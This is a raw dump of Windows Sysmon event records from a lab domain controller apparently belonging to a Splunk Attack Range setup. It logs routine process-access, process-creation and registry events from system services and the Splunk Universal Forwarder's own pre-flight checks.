13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4700-00000000A301}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E59-6005-4700-00000000A301}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.095{59A5CD1D-8E59-6005-4700-00000000A301}3956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.048{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.017{59A5CD1D-8E58-6005-4600-00000000A301}39323936C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5A-6005-5100-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.908{59A5CD1D-8E5A-6005-5100-00000000A301}36403628C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.673{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5A-6005-5100-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5A-6005-5100-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E5A-6005-5100-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.671{59A5CD1D-8E5A-6005-5100-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.626{59A5CD1D-8E5A-6005-5000-00000000A301}33683364C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:18.580{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD 